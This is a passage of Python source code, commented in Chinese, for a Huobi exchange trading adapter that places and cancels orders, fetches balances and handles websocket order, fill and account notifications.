# Initializing our REST API client.
self._rest_api = HuobiRestAPI(self._host, self._access_key, self._secret_key)
self._account_id = None
self._syminfo:DefaultDict[str: Dict[str, Any]] = defaultdict(dict)
self._orders:DefaultDict[str: Dict[str, Order]] = defaultdict(dict)
#e.g. {"BTC": {"free": 1.1, "locked": 2.2, "total": 3.3}, ... }
self._assets: DefaultDict[str: Dict[str, float]] = defaultdict(lambda: {k: 0.0 for k in {'free', 'locked', 'total'}})
"""
可以订阅两种订单更新频道,新方式和旧方式
新方式:
优点:延时小,大约100毫秒,不乱序,不丢包.
缺点:包含信息量不全面,需要程序自己维护上下文状态才能获取完整信息.
旧方式:
优点:信息包含全面,程序不需要自己维护上下文状态.
缺点:延时大,大约270毫秒,乱序,可能丢包(比如服务重启的时候).
"""
self._use_old_style_order_channel = False #默认用新方式订阅
self._pending_order_infos = [] #提交订单函数返回和订单websocket通知顺序不确定,所以需要借助这个变量构造一个完整订单通知上层策略
self._order_channel = []
for sym in self._symbols:
if self._use_old_style_order_channel:
self._order_channel.append("orders.{}".format(sym))
else:
self._order_channel.append("orders.{}.update".format(sym))
if self._account != None:
self.initialize()
#如果四个行情回调函数都为空的话,就根本不需要执行市场行情相关代码
if (self.cb.on_kline_update_callback or
self.cb.on_orderbook_update_callback or
self.cb.on_trade_update_callback or
self.cb.on_ticker_update_callback):
#市场行情数据
HuobiMarket(**kwargs)
async def create_order(self, symbol, action, price, quantity, order_type=ORDER_TYPE_LIMIT):
""" 创建订单
@param symbol 交易对
@param action 交易方向 BUY / SELL
@param price 委托价格
@param quantity 委托数量
@param order_type 委托类型 LIMIT / MARKET
"""
if action == ORDER_ACTION_BUY:
if order_type == ORDER_TYPE_LIMIT:
t = "buy-limit"
elif order_type == ORDER_TYPE_MARKET:
t = "buy-market"
elif order_type == ORDER_TYPE_IOC:
t = "buy-ioc"
else:
logger.error("order_type error! order_type:", order_type, caller=self)
return None, "order type error"
elif action == ORDER_ACTION_SELL:
if order_type == ORDER_TYPE_LIMIT:
t = "sell-limit"
elif order_type == ORDER_TYPE_MARKET:
t = "sell-market"
elif order_type == ORDER_TYPE_IOC:
t = "sell-ioc"
else:
logger.error("order_type error! order_type:", order_type, caller=self)
return None, "order type error"
else:
logger.error("action error! action:", action, caller=self)
return None, "action error"
price = tools.float_to_str(price)
quantity = tools.float_to_str(quantity)
result, error = await self._rest_api.create_order(symbol, price, quantity, t)
#=====================================================
#是否订阅的是新的订单更新频道
if not self._use_old_style_order_channel:
#如果下单成功,将新订单保存到缓存里
if error == None:
order_no = result
tm = tools.get_cur_timestamp_ms()
o = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"order_no": order_no,
"action": action,
"symbol": symbol,
"price": float(price),
"quantity": float(quantity),
"remain": float(quantity),
"status": ORDER_STATUS_SUBMITTED,
"order_type": order_type,
"ctime": tm,
"utime": tm
#avg_price
}
order = Order(**o)
self._orders[symbol][order_no] = order
#如果提交订单函数返回的订单ID存在于_pending_order_infos列表中,那证明是websocket通知先于订单函数返回
msgs = [i for i in self._pending_order_infos if (i["data"]["symbol"]==order.symbol and str(i["data"]["order-id"])==order.order_no)]
if len(msgs) >= 1:
msg = msgs[0]
self._update_order_and_fill(msg) #这里可以理解为重新update一次,因为上一次在websocket通知回调中update没成功(参考上下文代码逻辑去理解)
self._pending_order_infos.remove(msg) #把已经处理过的订单数据从_pending_order_infos里面删除
#=====================================================
return result, error
async def revoke_order(self, symbol, *order_nos):
""" 撤销订单
@param symbol 交易对
@param order_nos 订单号列表,可传入任意多个,如果不传入,那么就撤销所有订单
备注:关于批量删除订单函数返回值格式,如果函数调用失败了那肯定是return None, error
如果函数调用成功,但是多个订单有成功有失败的情况,比如输入3个订单id,成功2个,失败1个,那么
返回值统一都类似:
return [(成功订单ID, None),(成功订单ID, None),(失败订单ID, "失败原因")], None
"""
# 如果传入order_nos为空,即撤销全部委托单
if len(order_nos) == 0:
orders, error = await self.get_orders(symbol)
if error:
return [], error
if not orders:
return [], None
order_nos = [o.order_no for o in orders]
# 如果传入order_nos为一个委托单号,那么只撤销一个委托单
if len(order_nos) == 1:
success, error = await self._rest_api.revoke_order(order_nos[0])
if error:
return order_nos[0], error
else:
return order_nos[0], None
# 如果传入order_nos数量大于1,那么就批量撤销传入的委托单
if len(order_nos) > 1:
"""
{
"status": "ok",
"data": {
"success": [
"5983466"
],
"failed": [
{
"err-msg": "Incorrect order state",
"order-state": 7,
"order-id": "",
"err-code": "order-orderstate-error",
"client-order-id": "first"
},
{
"err-msg": "The record is not found.",
"order-id": "",
"err-code": "base-not-found",
"client-order-id": "second"
}
]
}
}
"""
s, e = await self._rest_api.revoke_orders(order_nos)
if e:
return [], e
result = []
for x in s["success"]:
result.append((x, None))
for x in s["failed"]:
result.append((x["order-id"], x["err-msg"]))
return result, None
async def get_orders(self, symbol):
""" 获取当前挂单列表
Args:
symbol: Trade target
Returns:
orders: Order list if successfully, otherwise it's None.
error: Error information, otherwise it's None.
"""
#{"status": "ok", "data": [{"filled-cash-amount": "0.0", "filled-fees": "0.0", "filled-amount": "0.0", "symbol": "trxeth", "source": "web", "created-at": 1575100309209, "amount": "17.000000000000000000", "account-id": 11261082, "price": "0.000100000000000000", "id": 58040174635, "state": "submitted", "type": "buy-limit"}, {"filled-cash-amount": "0.0", "filled-fees": "0.0", "filled-amount": "0.0", "symbol": "trxeth", "source": "web", "created-at": 1575018429010, "amount": "10.000000000000000000", "account-id": 11261082, "price": "0.000100000000000000", "id": 57906933472, "state": "submitted", "type": "buy-limit"}]}
success, error = await self._rest_api.get_open_orders(symbol)
if error:
return None, error
else:
orders:List[Order] = []
for order_info in success:
order = self._convert_order_format(order_info)
orders.append(order)
return orders, None
async def get_assets(self):
""" 获取交易账户资产信息
Args:
None
Returns:
assets: Asset if successfully, otherwise it's None.
error: Error information, otherwise it's None.
"""
#{"status": "ok", "data": {"id": 11261082, "type": "spot", "state": "working", "list": [{"currency": "lun", "type": "trade", "balance": "0"}, {"currency": "lun", "type": "frozen", "balance": "0"}]}}
success, error = await self._rest_api.get_account_balance()
if error:
return None, error
assets: DefaultDict[str: Dict[str, float]] = defaultdict(lambda: {k: 0.0 for k in {'free', 'locked', 'total'}})
for d in success["list"]:
b = d["balance"]
if b == "0": continue
c = d["currency"]
t = d["type"]
if t == "trade":
assets[c]["free"] = float(b)
elif t == "frozen":
assets[c]["locked"] = float(b)
for (_, v) in assets.items():
v["total"] = v["free"] + v["locked"]
ast = Asset(self._platform, self._account, assets, tools.get_cur_timestamp_ms(), True)
return ast, None
async def get_position(self, symbol):
""" 获取当前持仓
Args:
symbol: Trade target
Returns:
position: Position if successfully, otherwise it's None.
error: Error information, otherwise it's None.
"""
raise NotImplementedError
async def get_symbol_info(self, symbol):
""" 获取指定符号相关信息
Args:
symbol: Trade target
Returns:
symbol_info: SymbolInfo if successfully, otherwise it's None.
error: Error information, otherwise it's None.
"""
"""
[{
symbol-partition = "main", #交易区,可能值: [main,innovation]
symbol = "trxeth", #交易对
state = "online", #交易对状态;可能值: [online,offline,suspend] online - 已上线;offline - 交易对已下线,不可交易;suspend -- 交易暂停
base-currency = "trx", #交易对中的基础币种
quote-currency = "eth", #交易对中的报价币种
price-precision = 8, #交易对报价的精度(小数点后位数)
amount-precision = 2, #交易对基础币种计数精度(小数点后位数)
value-precision = 8, #交易对交易金额的精度(小数点后位数)
min-order-amt = 1, #交易对最小下单量 (下单量指当订单类型为限价单或sell-market时,下单接口传的'amount')
max-order-amt = 10000000, #交易对最大下单量
min-order-value = 0.001, #最小下单金额 (下单金额指当订单类型为限价单时,下单接口传入的(amount * price)。当订单类型为buy-market时,下单接口传的'amount')
#"leverage-ratio":4 #交易对杠杆最大倍数(杠杆交易才有这个字段)
},]
"""
info = self._syminfo[symbol]
if not info:
return None, "Symbol not exist"
price_tick = 1/float(10**info["price-precision"])
size_tick = 1/float(10**info["amount-precision"])
size_limit = info["min-order-amt"]
value_tick = 1/float(10**info["value-precision"])
value_limit = info["min-order-value"]
base_currency = info["base-currency"]
quote_currency = info["quote-currency"]
settlement_currency = info["quote-currency"]
symbol_type = "spot"
is_inverse = False
multiplier = 1
syminfo = SymbolInfo(self._platform, symbol, price_tick, size_tick, size_limit, value_tick, value_limit, base_currency, quote_currency, settlement_currency, symbol_type, is_inverse, multiplier)
return syminfo, None
async def invalid_indicate(self, symbol, indicate_type):
""" update (an) callback function.
Args:
symbol: Trade target
indicate_type: INDICATE_ORDER, INDICATE_ASSET, INDICATE_POSITION
Returns:
success: If execute successfully, return True, otherwise it's False.
error: If execute failed, return error information, otherwise it's None.
"""
async def _task():
if indicate_type == INDICATE_ORDER and self.cb.on_order_update_callback:
success, error = await self.get_orders(symbol)
if error:
state = State(self._platform, self._account, "get_orders error: {}".format(error), State.STATE_CODE_GENERAL_ERROR)
SingleTask.run(self.cb.on_state_update_callback, state)
return
for order in success:
SingleTask.run(self.cb.on_order_update_callback, order)
elif indicate_type == INDICATE_ASSET and self.cb.on_asset_update_callback:
success, error = await self.get_assets()
if error:
state = State(self._platform, self._account, "get_assets error: {}".format(error), State.STATE_CODE_GENERAL_ERROR)
SingleTask.run(self.cb.on_state_update_callback, state)
return
SingleTask.run(self.cb.on_asset_update_callback, success)
if indicate_type == INDICATE_ORDER or indicate_type == INDICATE_ASSET:
SingleTask.run(_task)
return True, None
elif indicate_type == INDICATE_POSITION:
raise NotImplementedError
else:
logger.error("indicate_type error! indicate_type:", indicate_type, caller=self)
return False, "indicate_type error"
@property
def rest_api(self):
return self._rest_api
async def connected_callback(self):
""" 建立连接之后,授权登陆,然后订阅相关频道等
"""
#进行登录认证,然后订阅需要登录后才能订阅的私有频道
timestamp = datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S")
params = {
"AccessKeyId": self._access_key,
"SignatureMethod": "HmacSHA256",
"SignatureVersion": "2",
"Timestamp": timestamp
}
signature = self._rest_api.generate_signature("GET", params, "api.huobi.me", "/ws/v1")
params["op"] = "auth"
params["Signature"] = signature
await self.send_json(params)
async def _auth_success_callback(self):
""" 授权成功之后回调
"""
#获取现货账户ID
self._account_id = await self._rest_api.get_account_id()
if self._account_id == None:
state = State(self._platform, self._account, "get_account_id error", State.STATE_CODE_GENERAL_ERROR)
SingleTask.run(self.cb.on_state_update_callback, state)
#初始化过程中发生错误,关闭网络连接,触发重连机制
await self.socket_close()
return
#获取相关符号信息
success, error = await self._rest_api.get_symbols_info()
if error:
state = State(self._platform, self._account, "get_symbols_info error: {}".format(error), State.STATE_CODE_GENERAL_ERROR)
SingleTask.run(self.cb.on_state_update_callback, state)
#初始化过程中发生错误,关闭网络连接,触发重连机制
await self.socket_close()
return
for info in success:
self._syminfo[info["symbol"]] = info #符号信息一般不变,获取一次保存好,其他地方要用直接从这个变量获取就可以了
#获取账户余额,更新资产
#{"status": "ok", "data": {"id": 11261082, "type": "spot", "state": "working", "list": [{"currency": "lun", "type": "trade", "balance": "0"}, {"currency": "lun", "type": "frozen", "balance": "0"}]}}
success, error = await self._rest_api.get_account_balance()
if error:
state = State(self._platform, self._account, "get_account_balance error: {}".format(error), State.STATE_CODE_GENERAL_ERROR)
SingleTask.run(self.cb.on_state_update_callback, state)
#初始化过程中发生错误,关闭网络连接,触发重连机制
await self.socket_close()
return
for d in success["list"]:
b = d["balance"]
if b == "0": continue
c = d["currency"]
t = d["type"]
if t == "trade":
self._assets[c]["free"] = float(b)
#elif t == "frozen":
# self._assets[c]["locked"] = b
ast = Asset(self._platform, self._account, self._assets, tools.get_cur_timestamp_ms(), True)
if self.cb.on_asset_update_callback:
SingleTask.run(self.cb.on_asset_update_callback, ast)
#获取当前未完成订单
for sym in self._symbols:
success, error = await self.get_orders(sym)
if error:
state = State(self._platform, self._account, "get_orders error: {}".format(error), State.STATE_CODE_GENERAL_ERROR)
SingleTask.run(self.cb.on_state_update_callback, state)
#初始化过程中发生错误,关闭网络连接,触发重连机制
await self.socket_close()
return
for order in success:
#是否订阅的是新的订单更新频道
if not self._use_old_style_order_channel:
self._orders[sym][order.order_no] = order
if self.cb.on_order_update_callback:
SingleTask.run(self.cb.on_order_update_callback, order)
#订阅账号资产信息
if self.cb.on_asset_update_callback:
params = {
"op": "sub",
"topic": "accounts",
"model": "0"
}
await self.send_json(params)
#订阅订单更新频道
if self.cb.on_order_update_callback or self.cb.on_fill_update_callback:
for ch in self._order_channel:
params = {
"op": "sub",
"topic": ch
}
await self.send_json(params)
#计数初始化0
self._subscribe_response_count = 0
async def process_binary(self, raw):
""" 处理websocket上接收到的消息
@param raw 原始的压缩数据
"""
#{'op': 'error', 'ts': 1575003013045, 'err-code': 1002, 'err-msg': 'internal error : auth not received.'}
#{'op': 'close', 'ts': 1575003013045}
#{'op': 'auth', 'ts': 1575003739511, 'err-code': 0, 'data': {'user-id': 12053842}}
#{'op': 'ping', 'ts': 1575003876880}
#{'op': 'sub', 'ts': 1575003877414, 'topic': 'orders.eoseth.update', 'err-code': 0}
#{'op': 'sub', 'ts': 1575003882668, 'topic': 'orders.trxeth.update', 'err-code': 0}
#{'op': 'sub', 'ts': 1575003888499, 'topic': 'accounts', 'err-code': 0
#==创建订单:
#{'op': 'notify', 'ts': 1575004328706, 'topic': 'accounts', 'data': {'event': 'order.place', 'list': [{'account-id': 10432498, 'currency': 'eth', 'type': 'trade', 'balance': '0.71662865'}]}}
#{'op': 'notify', 'ts': 1575004328733, 'topic': 'orders.trxeth.update', 'data': {'role': 'taker', 'match-id': 100413368307, 'filled-cash-amount': '0', 'filled-amount': '0', 'price': '0.0001', 'order-id': 57886011451, 'client-order-id': '', 'order-type': 'buy-limit', 'unfilled-amount': '10', 'symbol': 'trxeth', 'order-state': 'submitted'}}
#==撤销订单:
#{'op': 'notify', 'ts': 1575004686930, 'topic': 'orders.trxeth.update', 'data': {'role': 'taker', 'match-id': 100413372769, 'filled-cash-amount': '0', 'filled-amount': '0', 'price': '0.0001', 'order-id': 57886011451, 'client-order-id': '', 'order-type': 'buy-limit', 'unfilled-amount': '10', 'symbol': 'trxeth', 'order-state': 'canceled'}}
#{'op': 'notify', 'ts': 1575004687037, 'topic': 'accounts', 'data': {'event': 'order.cancel', 'list': [{'account-id': 10432498, 'currency': 'eth', 'type': 'trade', 'balance': '0.71762865'}]}}
msg = json.loads(gzip.decompress(raw).decode())
logger.debug("msg:", msg, caller=self)
op = msg.get("op")
if op == "auth": # 授权
if msg["err-code"] != 0:
state = State(self._platform, self._account, "Websocket connection authorized failed: {}".format(msg), State.STATE_CODE_GENERAL_ERROR)
logger.error(state, caller=self)
SingleTask.run(self.cb.on_state_update_callback, state)
return
logger.info("Websocket connection authorized successfully.", caller=self)
await self._auth_success_callback()
elif op == "error": # error
state = State(self._platform, self._account, "Websocket error: {}".format(msg), State.STATE_CODE_GENERAL_ERROR)
logger.error(state, caller=self)
SingleTask.run(self.cb.on_state_update_callback, state)
elif op == "close": # close
return
elif op == "ping": # ping
params = {
"op": "pong",
"ts": msg["ts"]
}
await self.send_json(params)
elif op == "sub": # 返回订阅操作是否成功
exist = False
for ch in self._order_channel:
if msg["topic"] == ch:
exist = True
break
if msg["topic"] == "accounts":
exist = True
if not exist:
return
if msg["err-code"] == 0:
self._subscribe_response_count = self._subscribe_response_count + 1 #每来一次订阅响应计数就加一
count = len(self._order_channel)+1 #应该要返回的订阅响应数
if self._subscribe_response_count == count: #所有的订阅都成功了,通知上层接口都准备好了
state = State(self._platform, self._account, "Environment ready", State.STATE_CODE_READY)
SingleTask.run(self.cb.on_state_update_callback, state)
else:
state = State(self._platform, self._account, "subscribe event error: {}".format(msg), State.STATE_CODE_GENERAL_ERROR)
logger.error(state, caller=self)
SingleTask.run(self.cb.on_state_update_callback, state)
elif op == "notify": # 频道更新通知
if msg["topic"] == "accounts":
self._update_asset(msg)
else:
for ch in self._order_channel:
if msg["topic"] == ch:
if self._use_old_style_order_channel:
self._update_order_and_fill_old_style(msg)
else:
self._update_order_and_fill(msg)
break
def _convert_order_format(self, order_info):
symbol = order_info["symbol"]
order_no = str(order_info["id"])
remain = float(order_info["amount"]) - float(order_info["filled-amount"])
action = ORDER_ACTION_BUY if order_info["type"] in ["buy-market", "buy-limit", "buy-ioc", "buy-limit-maker", "buy-stop-limit"] else ORDER_ACTION_SELL
if order_info["type"] in ["buy-market", "sell-market"]:
order_type = ORDER_TYPE_MARKET
elif order_info["type"] in ["buy-ioc", "sell-ioc"]:
order_type = ORDER_TYPE_IOC
else:
order_type = ORDER_TYPE_LIMIT
ctime = order_info["created-at"]
utime = order_info["created-at"]
state = order_info["state"]
if state == "canceled":
status = ORDER_STATUS_CANCELED
elif state == "partial-canceled":
status = ORDER_STATUS_CANCELED
elif state == "created":
status = ORDER_STATUS_SUBMITTED
elif state == "submitting":
status = ORDER_STATUS_SUBMITTED
elif state == "submitted":
status = ORDER_STATUS_SUBMITTED
elif state == "partical-filled":
status = ORDER_STATUS_PARTIAL_FILLED
elif state == "filled":
status = ORDER_STATUS_FILLED
else:
logger.error("status error! order_info:", order_info, caller=self)
status = ORDER_STATUS_NONE
info = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"order_no": order_no,
"action": action,
"symbol": symbol,
"price": float(order_info["price"]),
"quantity": float(order_info["amount"]),
"remain": remain,
"status": status,
"order_type": order_type,
"ctime": ctime,
"utime": utime
#avg_price
}
return Order(**info)
def _update_fill(self, order_info, ctime):
"""处理成交通知
"""
symbol = order_info["symbol"]
order_no = str(order_info["order-id"])
fill_no = str(order_info["match-id"])
price = float(order_info["price"]) #成交价格
size = float(order_info["filled-amount"]) #成交数量
side = ORDER_ACTION_BUY if order_info["order-type"] in ["buy-market", "buy-limit", "buy-ioc", "buy-limit-maker", "buy-stop-limit"] else ORDER_ACTION_SELL
liquidity = LIQUIDITY_TYPE_TAKER if order_info["role"]=="taker" else LIQUIDITY_TYPE_MAKER
f = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"fill_no": fill_no,
"order_no": order_no,
"side": side, #成交方向,买还是卖
"symbol": symbol,
"price": price, #成交价格
"quantity": size, #成交数量
"liquidity": liquidity, #maker成交还是taker成交
#"fee": fee, #通知里没提供,所以只能注释,或者也可以自己算
"ctime": ctime
}
fill = Fill(**f)
if self.cb.on_fill_update_callback:
SingleTask.run(self.cb.on_fill_update_callback, fill)
def _update_order_and_fill(self, msg):
"""
{
'op': 'notify',
'ts': 1575004328733,
'topic': 'orders.trxeth.update',
'data': {
'role': 'taker', #最近成交角色(当order-state = submitted, canceled, partial-canceled时,role 为缺省值taker;当order-state = filled, partial-filled 时,role 取值为taker 或maker。)
'match-id': 100413368307, #最近撮合编号(当order-state = submitted, canceled, partial-canceled时,match-id 为消息序列号;当order-state = filled, partial-filled 时,match-id 为最近撮合编号。)
'filled-cash-amount': '0', #最近成交数额
'filled-amount': '0', #最近成交数量
'price': '0.0001', #最新价(当order-state = submitted 时,price 为订单价格;当order-state = canceled, partial-canceled 时,price 为零;当order-state = filled, partial-filled 时,price 为最近成交价。)
'order-id': 57886011451, #订单编号
'client-order-id': '', #用户自编订单号
'order-type': 'buy-limit', #订单类型,包括buy-market, sell-market, buy-limit, sell-limit, buy-ioc, sell-ioc, buy-limit-maker, sell-limit-maker, buy-stop-limit, sell-stop-limit
'unfilled-amount': '10', #最近未成交数量(当order-state = submitted 时,unfilled-amount 为原始订单量;当order-state = canceled OR partial-canceled 时,unfilled-amount 为未成交数量;当order-state = filled 时,如果 order-type = buy-market,unfilled-amount 可能为一极小值;如果order-type <> buy-market 时,unfilled-amount 为零;当order-state = partial-filled AND role = taker 时,unfilled-amount 为未成交数量;当order-state = partial-filled AND role = maker 时,unfilled-amount 为未成交数量。)
'symbol': 'trxeth', #交易代码
'order-state': 'submitted' #订单状态, 有效取值: submitted, partial-filled, filled, canceled, partial-canceled
}
}
"""
order_info = msg["data"]
state = order_info["order-state"]
if state == "canceled":
status = ORDER_STATUS_CANCELED
elif state == "partial-canceled":
status = ORDER_STATUS_CANCELED
elif state == "created":
status = ORDER_STATUS_SUBMITTED
elif state == "submitting":
status = ORDER_STATUS_SUBMITTED
elif state == "submitted":
status = ORDER_STATUS_SUBMITTED
elif state == "partical-filled":
status = ORDER_STATUS_PARTIAL_FILLED
elif state == "filled":
status = ORDER_STATUS_FILLED
else:
logger.error("status error! order_info:", order_info, caller=self)
return
symbol = order_info["symbol"]
order_no = str(order_info["order-id"])
action = ORDER_ACTION_BUY if order_info["order-type"] in ["buy-market", "buy-limit", "buy-ioc", "buy-limit-maker", "buy-stop-limit"] else ORDER_ACTION_SELL
if order_info["order-type"] in ["buy-market", "sell-market"]:
order_type = ORDER_TYPE_MARKET
elif order_info["order-type"] in ["buy-ioc", "sell-ioc"]:
order_type = ORDER_TYPE_IOC
else:
order_type = ORDER_TYPE_LIMIT
#tm = msg["ts"]
tm = tools.get_cur_timestamp_ms()
order = self._orders[symbol].get(order_no)
if order == None:
#执行到这里一般有几种情况,比如说用户在web网站下单,也有可能是我们自己的策略调用下单函数下的单,但是在下单函数返回前,websocket先收到订单通知.
#不管是什么情况,总之只保存10个最新的订单信息,如果超过10个,就把最老的一个订单信息删除掉,把最新的保存
if len(self._pending_order_infos) > 10:
self._pending_order_infos.pop() #弹出列表中最后一个元素
self._pending_order_infos.insert(0, msg) #保存到列表第一个位置
return #如果收到的订单通知在缓存中不存在的话就直接忽略不处理
if action == ORDER_ACTION_BUY and order_type == ORDER_TYPE_MARKET:
order.remain = order.quantity - float(order_info["filled-cash-amount"]) #市价买单传入的是金额,输出的也要是金额
else:
order.remain = float(order_info["unfilled-amount"])
order.status = status
order.utime = tm
if self.cb.on_order_update_callback:
SingleTask.run(self.cb.on_order_update_callback, order)
if status in [ORDER_STATUS_CANCELED, ORDER_STATUS_FILLED]:
self._orders[symbol].pop(order_no) #这个订单完成了,从缓存里面删除
#如果是成交通知,就处理成交回调
if status == ORDER_STATUS_PARTIAL_FILLED or status == ORDER_STATUS_FILLED:
self._update_fill(order_info, tm)
def _update_order_and_fill_old_style(self, msg):
""" 更新订单信息
@param msg 订单信息
"""
#{'op': 'notify', 'ts': 1575268899866, 'topic': 'orders.trxeth', 'data': {'seq-id': 100418110944, 'order-id': 58326818953, 'symbol': 'trxeth', 'account-id': 11261082, 'order-amount': '10', 'order-price': '0.000104', 'created-at': 1575268899682, 'order-type': 'buy-limit', 'order-source': 'spot-web', 'order-state': 'filled', 'role': 'taker', 'price': '0.00010399', 'filled-amount': '10', 'unfilled-amount': '0', 'filled-cash-amount': '0.0010399', 'filled-fees': '0.02'}}
#{'op': 'notify', 'ts': 1575269220762, 'topic': 'orders.trxeth', 'data': {'seq-id': 100418116512, 'order-id': 58324882527, 'symbol': 'trxeth', 'account-id': 11261082, 'order-amount': '10', 'order-price': '0.00010376', 'created-at': 1575269220597, 'order-type': 'buy-limit', 'order-source': 'spot-web', 'order-state': 'canceled', 'role': 'taker', 'price': '0.00010376', 'filled-amount': '0', 'unfilled-amount': '10', 'filled-cash-amount': '0', 'filled-fees': '0'}}
#{'op': 'notify', 'ts': 1575269259564, 'topic': 'orders.trxeth', 'data': {'seq-id': 100418116991, 'order-id': 58327457834, 'symbol': 'trxeth', 'account-id': 11261082, 'order-amount': '9.98', 'order-price': '0', 'created-at': 1575269259451, 'order-type': 'sell-market', 'order-source': 'spot-web', 'order-state': 'filled', 'role': 'taker', 'price': '0.00010407', 'filled-amount': '9.98', 'unfilled-amount': '0', 'filled-cash-amount': '0.0010386186', 'filled-fees': '0.0000020772372'}}
#{'op': 'notify', 'ts': 1575269323862, 'topic': 'orders.trxeth', 'data': {'seq-id': 100418118242, 'order-id': 58327583981, 'symbol': 'trxeth', 'account-id': 11261082, 'order-amount': '0.001', 'order-price': '0', 'created-at': 1575269323654, 'order-type': 'buy-market', 'order-source': 'spot-web', 'order-state': 'filled', 'role': 'taker', 'price': '0.00010425', 'filled-amount': '9.59232613908872901', 'unfilled-amount': '0', 'filled-cash-amount': '0.000999999999999999', 'filled-fees': '0.019184652278177458'}}
"""
{
'op': 'notify',
'ts': 1575269323862,
'topic': 'orders.trxeth',
'data': {
'seq-id': 100418118242,
'order-id': 58327583981,
'symbol': 'trxeth',
'account-id': 11261082,
'order-amount': '0.001',
'order-price': '0',
'created-at': 1575269323654,
'order-type': 'buy-market',
'order-source': 'spot-web',
'order-state': 'filled',
'role': 'taker',
'price': '0.00010425',
'filled-amount': '9.59232613908872901',
'unfilled-amount': '0',
'filled-cash-amount': '0.000999999999999999',
'filled-fees': '0.019184652278177458'}
}
"""
tm = msg["ts"]
order_info = msg["data"]
symbol = order_info["symbol"]
order_no = str(order_info["order-id"])
action = ORDER_ACTION_BUY if order_info["order-type"] in ["buy-market", "buy-limit", "buy-ioc", "buy-limit-maker", "buy-stop-limit"] else ORDER_ACTION_SELL
if order_info["order-type"] in ["buy-market", "sell-market"]:
order_type = ORDER_TYPE_MARKET
elif order_info["order-type"] in ["buy-ioc", "sell-ioc"]:
order_type = ORDER_TYPE_IOC
else:
order_type = ORDER_TYPE_LIMIT
quantity = float(order_info["order-amount"])
if action == ORDER_ACTION_BUY and order_type == ORDER_TYPE_MARKET:
remain = quantity - float(order_info["filled-cash-amount"]) #市价买单传入的是金额,输出的也要是金额
else:
remain = float(order_info["unfilled-amount"])
ctime = order_info["created-at"]
utime = tm
state = order_info["order-state"]
if state == "canceled":
status = ORDER_STATUS_CANCELED
elif state == "partial-canceled":
status = ORDER_STATUS_CANCELED
elif state == "created":
status = ORDER_STATUS_SUBMITTED
elif state == "submitting":
status = ORDER_STATUS_SUBMITTED
elif state == "submitted":
status = ORDER_STATUS_SUBMITTED
elif state == "partical-filled":
status = ORDER_STATUS_PARTIAL_FILLED
elif state == "filled":
status = ORDER_STATUS_FILLED
else:
logger.error("status error! order_info:", order_info, caller=self)
return
info = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"order_no": order_no,
"action": action,
"symbol": symbol,
"price": float(order_info["order-price"]),
"quantity": quantity,
"remain": remain,
"status": status,
"order_type": order_type,
"ctime": ctime,
"utime": utime
#avg_price
}
order = Order(**info)
if self.cb.on_order_update_callback:
SingleTask.run(self.cb.on_order_update_callback, order)
#=====================================================================================
#接下来处理成交回调
if status == ORDER_STATUS_PARTIAL_FILLED or status == ORDER_STATUS_FILLED:
fill_no = str(order_info["seq-id"])
price = float(order_info["price"]) #成交价格
size = float(order_info["filled-amount"]) #成交数量
side = action
liquidity = LIQUIDITY_TYPE_TAKER if order_info["role"]=="taker" else LIQUIDITY_TYPE_MAKER
fee = float(order_info["filled-fees"])
f = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"fill_no": fill_no,
"order_no": order_no,
"side": side, #成交方向,买还是卖
"symbol": symbol,
"price": price, #成交价格
"quantity": size, #成交数量
"liquidity": liquidity, #maker成交还是taker成交
"fee": fee,
"ctime": tm
}
fill = Fill(**f)
if self.cb.on_fill_update_callback:
SingleTask.run(self.cb.on_fill_update_callback, fill)
def _update_asset(self, msg):
"""
{
'op': 'notify',
'ts': 1575004687037,
'topic': 'accounts',
'data': {
'event': 'order.cancel', #资产变化通知相关事件说明,比如订单创建(order.place) 、订单成交(order.match)、订单成交退款(order.refund)、订单撤销(order.cancel) 、点卡抵扣交易手续费(order.fee-refund)、杠杆账户划转(margin.transfer)、借币本金(margin.loan)、借币计息(margin.interest)、归还借币本金利息(margin.repay)、其他资产变化(other)
'list': [
{
'account-id': 10432498, #账户id
'currency': 'eth', #币种
'type': 'trade', #交易(trade),借币(loan),利息(interest)
'balance': '0.71762865' #账户余额 (当订阅model=0时,该余额为可用余额;当订阅model=1时,该余额为总余额)
}
]
}
}
"""
tm = msg["ts"]
account_info = msg["data"]
for d in account_info["list"]:
b = d["balance"]
c = d["currency"]
self._assets[c]["free"] = float(b)
ast = Asset(self._platform, self._account, self._assets, tm, True)
SingleTask.run(self.cb.on_asset_update_callback, ast)
@staticmethod
def mapping_layer():
""" 获取符号映射关系.
Returns:
layer: 符号映射关系
"""
layer = Trader.MAPPING_LAYER()
layer.is_upper = True
layer.map_dict = {
"BTC/USDT": "btcusdt",
"ETH/USDT": "ethusdt",
"EOS/USDT": "eosusdt",
"BCH/USDT": "bchusdt",
"BSV/USDT": "bsvusdt",
"LTC/USDT": "ltcusdt",
"XRP/USDT": "xrpusdt",
"ADA/USDT": "adausdt",
"TRX/USDT": "trxusdt",
#
"ETH/BTC": "ethbtc",
"EOS/BTC": "eosbtc",
"BCH/BTC": "bchbtc",
"BSV/BTC": "bsvbtc",
"LTC/BTC": "ltcbtc",
"XRP/BTC": "xrpbtc",
"ADA/BTC": "adabtc",
"TRX/BTC": "trxbtc",
#
"EOS/ETH": "eoseth",
"TRX/ETH": "trxeth"
}
return layer
class HuobiMarket(Websocket):
""" Huobi Market Server.
"""
def __init__(self, **kwargs):
self.cb = kwargs["cb"]
self._platform = kwargs["platform"]
self._symbols = kwargs["symbols"]
self._wss = "wss://api.huobi.me"
url = self._wss + "/ws"
super(HuobiMarket, self).__init__(url, send_hb_interval=0, **kwargs)
#self.heartbeat_msg = "ping"
self._c_to_s = {} # {"channel": "symbol"}
self._prev_kline_map = defaultdict(lambda:None)
self.initialize()
async def connected_callback(self):
"""After create Websocket connection successfully, we will subscribing orderbook/trade/kline events."""
if self.cb.on_kline_update_callback:
for symbol in self._symbols:
channel = self._symbol_to_channel(symbol, "kline")
if channel:
data = {"sub": channel}
await self.send_json(data)
if self.cb.on_orderbook_update_callback:
for symbol in self._symbols:
channel = self._symbol_to_channel(symbol, "depth")
if channel:
data = {"sub": channel}
await self.send_json(data)
if self.cb.on_trade_update_callback:
for symbol in self._symbols:
channel = self._symbol_to_channel(symbol, "trade")
if channel:
